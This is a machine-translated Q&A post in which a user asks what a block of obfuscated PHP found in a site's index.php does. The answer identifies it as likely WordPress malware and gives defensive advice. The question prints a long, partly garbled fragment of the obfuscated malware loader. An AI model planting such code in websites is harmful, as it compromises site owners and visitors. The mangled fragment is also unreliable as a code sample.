在我无法访问的网站上的 index.php 中发现此代码...它是做什么的?

在我无法访问的网站上的 index.php 中发现此代码...它是做什么的?
!} x27;!>>>!}_;gvc%}&;ftmbg} x77{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#jw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H5#*%fdy!%tdz)%bbT-%bT-%hW~%fdy)##-!#~/7&6|7**111127-zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W6!2p%!*3>?*2b%)gpf{jt)!gj!pjudovg x22)!gj}1~!52]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24hmg%!j%!|!*#d%62bd%!.%!> x22:ftmbg39*56mg%)!gj!~:,,Bjg!)%j:>>1*!%b:>1%s: x5c%j:.2^,%b:%s: x5c%j:^*ofmy%)utjm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!]26 x24- x24j%!*9! x27!hnjA x27&6!fyqmpef)# x24*! x24Yp x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e";*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!427]36]373P6]36]73]83]238M7]381]211M5]67]4*XAZASVu%VU#L4]275L3]248L3P6L1M5]D2P4]D6##]D6]281L1#/#M5]DgP5]D6##]D4]273]D6P2L5P6]y6gP7L6M7]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmj]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/00#*}&;!osvufs} x7f;!o_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278])sutcvt)!gj!|!*bubE{h%)j{hnpd!opjud9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&dr_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#!" x61 156 x75 156 x61"]=1; $uas=strtolower($_SERVER[" 6,#/q%>2q%q%V! x24/%tjw/ x24)% x24- x24y4 x24- x24]y8 x24- x24]48y]#>s%q%m%ldpt%}K;`ufldpt}X;`msvd}R;*str($uas," x61 156 x64 162 x6f 151 x64"))) { $hsbdriw = " x63 162 函数 bknbpvb($n){return chr(ord($n)-1);} @error_repor2986+7**^/%rx111!%yy)#}#-# x24- x24-tusqpt)%>qp%!|Z~!!2p%!|!*!*jQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c6##>>X)!gjZb%!**X)ufttj x22)gj!|!*nbsS,6! x242178}527}88:}334}472 x24/7rfs%:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!>*4-1-bubE{h%SUT`LDPT7-UFOJ`GB)fubfsdX)%j>1^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj632j%!*72! x27!hmg%)!gjdovg}{;#)tutjyf`opjudov3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77zbek!~!b%Zb%!*(%w:!>! x246767~6!bssbz) x24]25 x24- x24-!% x24- x24*!|! x24- x2j%7-K)udfoopdXA x22)7gj6>}R;msv}.;/#/#/67j**b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+s` x5c^>Ew:Qb:Qc:W~!%z!>21#p#/#p#/%z>2*A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|%}U;y]}R;2]},;osvufs} x27;mnui}&;zep*!%i x5c2^ x2272qj%)7gj6]D4]82]K6]72]K9]78]K5]53]Kc#!#]D&& (!isset($GLOBALS[" x61 156 x75 156 x61"])))) { $GLOBALS[_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpix::h%:n%!#]y84]2757,*e x27,*d x27,*c x27,*b x27)fepq%6! x2400~:/h%:> x22!pd%)!gj}Z;h!opju]y83]273]y76]277##]y74]273ovg!|!**#j{hnpd#)tutjyf`ogj5h%!! x24/%tmw/x24)%-x24*

答案1

这是一些模糊的 PHP 代码。我没有费心(并且认为没有用)去进一步研究它。

  • 您可以在非特权帐户下从命令行执行它(或者更好的是 - 从 VM 执行它,这样您就可以拒绝它的网络访问 - 可能是数据库访问 - 如果它具有嵌入凭据)并查看会发生什么。
  • 不过,我建议您尝试手动对其进行反混淆,作为一个脑筋急转弯。
    • 请注意,您可以通过命令行解释器运行 PHP 代码块,让它为您完成大部分工作。

对有关 Wordpress 的 SO 问题的评论这表明这可能是一个库存 Wordpress 文件。

进一步谷歌搜索“php obfuscator“沉默是金”。我发现https://security.stackexchange.com/questions/128546/obfuscated-php-code-found-in-wordpress-core-files-and-plugins. 案子结了。

最有可能的,这是一个 Wordpress 病毒。这更能激励您剖析它并查看它的作用。好吧,检查您的服务器是否存在异常 - 最好使用救援磁盘。

相关内容